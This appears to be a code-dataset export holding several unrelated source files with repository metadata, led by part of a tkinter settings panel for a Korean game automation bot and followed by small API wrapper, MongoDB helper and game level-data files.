'w', lambda *args: self.callback_notify_quickslot_item_empty(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('퀵슬롯 등록 아이템 부족'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'].trace(
'w', lambda *args: self.callback_notify_character_death(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('캐릭터 사망'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'].trace(
'w', lambda *args: self.callback_notify_local_quest_stop(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('지역 퀘스트 탐색 실패'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'].trace(
'w', lambda *args: self.callback_notify_quest_complete(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('퀘스트 완료'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# Notify tab: middle column
frame_m = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# Notify tab: right column
frame_r = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# # Notify tab: left column
# frame_l = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
# frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# # Notify tab: middle column
# frame_m = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
# frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# # Notify tab: right column
# frame_r = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
# frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# ------
self.option_dic['option_note'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.inner_frame_dic['options'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.set_game_option()
def callback_notify_quest_complete(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_local_quest_stop(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_character_death(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_quickslot_item_empty(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_11(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_10(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_9(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_8(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_7(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_6(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_5(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_4(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_3(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_2(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_1(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_0(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_set(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_potion_set(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_potion_number(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_hp(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_number(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_wanted_number(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_auto(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_auto(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_distance_limit(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_distance(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_distance(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_duration(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_limit_count(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_play_duration(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_duration(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_each_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
| 38.363718
| 138
| 0.729274
| 6,214
| 42,929
| 4.691181
| 0.052462
| 0.086927
| 0.086172
| 0.118487
| 0.908168
| 0.884772
| 0.873864
| 0.852698
| 0.8245
| 0.760145
| 0
| 0.010583
| 0.150341
| 42,929
| 1,118
| 139
| 38.398032
| 0.788239
| 0.068718
| 0
| 0.461071
| 0
| 0
| 0.093229
| 0.011113
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054745
| false
| 0
| 0.010949
| 0
| 0.088808
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0fbae7724e4c0d3495fddc386c1bcca666201d42
| 81
|
py
|
Python
|
macresources/__init__.py
|
elliotnunn/macresources
|
cc7c6aacec7d241c945d925c3a2473c3917ef4e0
|
[
"MIT"
] | 5
|
2019-09-25T01:09:07.000Z
|
2021-11-03T02:39:42.000Z
|
macresources/__init__.py
|
elliotnunn/macresources
|
cc7c6aacec7d241c945d925c3a2473c3917ef4e0
|
[
"MIT"
] | null | null | null |
macresources/__init__.py
|
elliotnunn/macresources
|
cc7c6aacec7d241c945d925c3a2473c3917ef4e0
|
[
"MIT"
] | null | null | null |
from .main import parse_rez_code, parse_file, make_rez_code, make_file, Resource
| 40.5
| 80
| 0.839506
| 14
| 81
| 4.428571
| 0.642857
| 0.225806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 1
| 81
| 81
| 0.849315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0fc8113b47d0e5a0ea88e1aadfb0ecad858b8e0d
| 584
|
py
|
Python
|
ZiggeoMetaProfiles.py
|
Ziggeo/ZiggeoPythonSdk
|
7c1e46bdd0649bdd58707747279da40783f14f8b
|
[
"Apache-2.0"
] | 3
|
2018-07-17T16:38:17.000Z
|
2020-10-31T19:56:47.000Z
|
ZiggeoMetaProfiles.py
|
Ziggeo/ZiggeoPythonSdk
|
7c1e46bdd0649bdd58707747279da40783f14f8b
|
[
"Apache-2.0"
] | 8
|
2015-08-20T15:59:13.000Z
|
2022-01-17T13:08:45.000Z
|
ZiggeoMetaProfiles.py
|
Ziggeo/ZiggeoPythonSdk
|
7c1e46bdd0649bdd58707747279da40783f14f8b
|
[
"Apache-2.0"
] | 7
|
2015-08-12T14:32:12.000Z
|
2019-10-30T05:26:51.000Z
|
class ZiggeoMetaProfiles:
def __init__(self, application):
self.__application = application
def create(self, data = None):
return self.__application.connect.postJSON('/v1/metaprofiles/', data)
def index(self, data = None):
return self.__application.connect.getJSON('/v1/metaprofiles/', data)
def get(self, token_or_key):
    return self.__application.connect.getJSON('/v1/metaprofiles/' + token_or_key)
def delete(self, token_or_key):
    return self.__application.connect.delete('/v1/metaprofiles/' + token_or_key)
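# A minimal usage sketch with a hypothetical stand-in application: the real
# object only needs a `connect` attribute exposing postJSON/getJSON/delete as
# used above. The fake below records calls instead of hitting the API.
if __name__ == '__main__':
    class _FakeConnect:
        def postJSON(self, path, data=None):
            return ('POST', path, data)
        def getJSON(self, path, data=None):
            return ('GET', path, data)
        def delete(self, path):
            return ('DELETE', path)

    class _FakeApp:
        connect = _FakeConnect()

    profiles = ZiggeoMetaProfiles(_FakeApp())
    print(profiles.create({'key': 'demo'}))  # ('POST', '/v1/metaprofiles/', {'key': 'demo'})
    print(profiles.get('demo'))              # ('GET', '/v1/metaprofiles/demo', None)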
| 32.444444
| 90
| 0.686644
| 67
| 584
| 5.656716
| 0.313433
| 0.237467
| 0.221636
| 0.295515
| 0.633245
| 0.543536
| 0.543536
| 0.221636
| 0
| 0
| 0
| 0.008403
| 0.184932
| 584
| 17
| 91
| 34.352941
| 0.787815
| 0
| 0
| 0
| 0
| 0
| 0.116638
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0
| 0
| 0.363636
| 0.909091
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
ba06826c76f4926253180e42728340f9d8145222
| 169
|
py
|
Python
|
src/monga/find_one.py
|
rizoadev/monga
|
e5d0e4bb1a4f33dc96ca03f2e199faf411afc29f
|
[
"MIT"
] | null | null | null |
src/monga/find_one.py
|
rizoadev/monga
|
e5d0e4bb1a4f33dc96ca03f2e199faf411afc29f
|
[
"MIT"
] | null | null | null |
src/monga/find_one.py
|
rizoadev/monga
|
e5d0e4bb1a4f33dc96ca03f2e199faf411afc29f
|
[
"MIT"
] | null | null | null |
class FindOne:
def __init__(self, collection):
self.collection = collection
def call(self, query: dict):
return self.collection.find_one(query)
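# A minimal usage sketch with a hypothetical in-memory collection; a real
# deployment would pass a pymongo collection such as db['users'], whose
# find_one has the same query semantics.
if __name__ == '__main__':
    class _FakeCollection:
        def __init__(self, docs):
            self._docs = docs

        def find_one(self, query):
            # Return the first document matching every key/value in the query.
            for doc in self._docs:
                if all(doc.get(k) == v for k, v in query.items()):
                    return doc
            return None

    finder = FindOne(_FakeCollection([{'name': 'ada'}, {'name': 'lin'}]))
    print(finder.call({'name': 'ada'}))  # {'name': 'ada'}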
| 24.142857
| 46
| 0.674556
| 20
| 169
| 5.45
| 0.6
| 0.385321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 169
| 6
| 47
| 28.166667
| 0.838462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
ba1830c6f2cd75fbdec8d9ae635f781e6606c413
| 42
|
py
|
Python
|
__init__.py
|
JulienMaille/segmentation_models.pytorch
|
4b18a48c14e05fe33ab13bd473195ef151d76e5e
|
[
"MIT"
] | null | null | null |
__init__.py
|
JulienMaille/segmentation_models.pytorch
|
4b18a48c14e05fe33ab13bd473195ef151d76e5e
|
[
"MIT"
] | null | null | null |
__init__.py
|
JulienMaille/segmentation_models.pytorch
|
4b18a48c14e05fe33ab13bd473195ef151d76e5e
|
[
"MIT"
] | null | null | null |
from .segmentation_models_pytorch import *
| 42
| 42
| 0.880952
| 5
| 42
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 42
| 1
| 42
| 42
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ba19f4ec97772213e352c73762114f9b65f1a9dc
| 133
|
py
|
Python
|
faa_computer_admin/src/faa_computer_admin/faa_control.py
|
njmei/fly-alcohol-assay
|
a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc
|
[
"BSD-3-Clause"
] | null | null | null |
faa_computer_admin/src/faa_computer_admin/faa_control.py
|
njmei/fly-alcohol-assay
|
a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc
|
[
"BSD-3-Clause"
] | null | null | null |
faa_computer_admin/src/faa_computer_admin/faa_control.py
|
njmei/fly-alcohol-assay
|
a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import roslib
roslib.load_manifest('faa_computer_admin')
from faa_computer_admin import control
control.cli()
| 19
| 42
| 0.819549
| 20
| 133
| 5.2
| 0.7
| 0.211538
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082707
| 133
| 6
| 43
| 22.166667
| 0.852459
| 0.150376
| 0
| 0
| 0
| 0
| 0.162162
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
ba21acedda3a2f065fdcb947043df9af2b090507
| 45
|
py
|
Python
|
malaya_speech/train/model/uis_rnn/__init__.py
|
ishine/malaya-speech
|
fd34afc7107af1656dff4b3201fa51dda54fde18
|
[
"MIT"
] | 111
|
2020-08-31T04:58:54.000Z
|
2022-03-29T15:44:18.000Z
|
malaya_speech/train/model/uis_rnn/__init__.py
|
ishine/malaya-speech
|
fd34afc7107af1656dff4b3201fa51dda54fde18
|
[
"MIT"
] | 14
|
2020-12-16T07:27:22.000Z
|
2022-03-15T17:39:01.000Z
|
malaya_speech/train/model/uis_rnn/__init__.py
|
ishine/malaya-speech
|
fd34afc7107af1656dff4b3201fa51dda54fde18
|
[
"MIT"
] | 29
|
2021-02-09T08:57:15.000Z
|
2022-03-12T14:09:19.000Z
|
from . import utils
from .model import Model
| 15
| 24
| 0.777778
| 7
| 45
| 5
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 25
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ba2fa0d9fb09fb1f7d3915ca9b8bb070a94485e2
| 6,145
|
py
|
Python
|
pirates/leveleditor/worldData/shipNavyMerchant1.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3
|
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/leveleditor/worldData/shipNavyMerchant1.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/leveleditor/worldData/shipNavyMerchant1.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1
|
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.shipNavyMerchant1
from pandac.PandaModules import Point3, VBase3, Vec4
objectStruct = {'Objects': {'1189038450.53gjeon': {'Type': 'Ship Part', 'Name': 'shipNavyMerchant1', 'Category': '11: Light Galleon', 'File': '', 'Flagship': False, 'Objects': {'1189038939.53gjeon': {'Type': 'Spawn Node', 'Aggro Radius': '12.0000', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-0.076, 5.03, 19.518), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Area', 'Start State': 'Patrol', 'Team': '2', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1189039087.17gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-10.6, 17.813, 19.902), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039094.02gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(10.578, 17.868, 19.904), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039108.98gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-11.112, -5.737, 19.199), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039114.83gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(9.664, -5.361, 19.21), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039147.55gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-11.571, 37.148, 31.22), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039158.58gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-18.083, 52.753, 29.735), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039162.2gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(18.445, 53.221, 29.7), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039165.75gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(11.591, 37.232, 31.221), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039173.88gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(-8.814, -36.65, 37.263), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039178.27gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(9.379, -36.475, 37.244), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1189039433.22gjeon': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(0.451, 44.859, 30.496), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}}, 'Respawns': True, 'Team': 'EvilNavy', 
'Visual': {'Model': ['models/shipparts/merchantL1-geometry_High', 'models/shipparts/merchantL1-collisions', 'models/shipparts/merchantCabinAL1-collisions', 'models/shipparts/merchantCabinAL1-geometry_High']}}}, 'Node Links': [['1189039087.17gjeon', '1189038939.53gjeon', 'Bi-directional'], ['1189039087.17gjeon', '1189039147.55gjeon', 'Bi-directional'], ['1189039158.58gjeon', '1189039147.55gjeon', 'Bi-directional'], ['1189039162.2gjeon', '1189039158.58gjeon', 'Bi-directional'], ['1189039165.75gjeon', '1189039162.2gjeon', 'Bi-directional'], ['1189039165.75gjeon', '1189039094.02gjeon', 'Bi-directional'], ['1189039114.83gjeon', '1189039094.02gjeon', 'Bi-directional'], ['1189039114.83gjeon', '1189039178.27gjeon', 'Bi-directional'], ['1189039114.83gjeon', '1189039108.98gjeon', 'Bi-directional'], ['1189038939.53gjeon', '1189039094.02gjeon', 'Bi-directional'], ['1189039173.88gjeon', '1189039108.98gjeon', 'Bi-directional'], ['1189039087.17gjeon', '1189039108.98gjeon', 'Bi-directional'], ['1189039433.22gjeon', '1189039147.55gjeon', 'Bi-directional'], ['1189039433.22gjeon', '1189039165.75gjeon', 'Bi-directional']], 'Layers': {}, 'ObjectIds': {'1189038450.53gjeon': '["Objects"]["1189038450.53gjeon"]', '1189038939.53gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189038939.53gjeon"]', '1189039087.17gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039087.17gjeon"]', '1189039094.02gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039094.02gjeon"]', '1189039108.98gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039108.98gjeon"]', '1189039114.83gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039114.83gjeon"]', '1189039147.55gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039147.55gjeon"]', '1189039158.58gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039158.58gjeon"]', '1189039162.2gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039162.2gjeon"]', '1189039165.75gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039165.75gjeon"]', '1189039173.88gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039173.88gjeon"]', '1189039178.27gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039178.27gjeon"]', '1189039433.22gjeon': '["Objects"]["1189038450.53gjeon"]["Objects"]["1189039433.22gjeon"]'}}
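# The 'Node Links' entries above are edges between the spawn and movement
# nodes; every link in this file is tagged 'Bi-directional'. A minimal sketch
# that folds them into an adjacency map:
if __name__ == '__main__':
    from collections import defaultdict

    adjacency = defaultdict(set)
    for node_a, node_b, direction in objectStruct['Node Links']:
        adjacency[node_a].add(node_b)
        if direction == 'Bi-directional':
            adjacency[node_b].add(node_a)
    print(len(adjacency), 'linked nodes')  # prints: 12 linked nodes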
| 1,024.166667
| 5,860
| 0.646705
| 848
| 6,145
| 4.683962
| 0.198113
| 0.036757
| 0.037009
| 0.036254
| 0.394763
| 0.389225
| 0.365559
| 0.365559
| 0.357503
| 0.347432
| 0
| 0.264382
| 0.083483
| 6,145
| 6
| 5,860
| 1,024.166667
| 0.440874
| 0.03629
| 0
| 0
| 0
| 0
| 0.59243
| 0.167962
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
e86196619c3d23a6d1028c9ec3a493690afaf4be
| 36
|
py
|
Python
|
researchutils/math/__init__.py
|
keio-ytlab/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 1
|
2018-10-25T12:57:38.000Z
|
2018-10-25T12:57:38.000Z
|
researchutils/math/__init__.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 28
|
2018-08-25T03:54:30.000Z
|
2018-10-14T12:09:47.000Z
|
researchutils/math/__init__.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | null | null | null |
from researchutils.math import angle
| 36
| 36
| 0.888889
| 5
| 36
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 36
| 1
| 36
| 36
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e869fec795149b024e8225e9b1c19c0606878796
| 8,623
|
py
|
Python
|
tests/test_to_latex.py
|
andersjel/paka.cmark
|
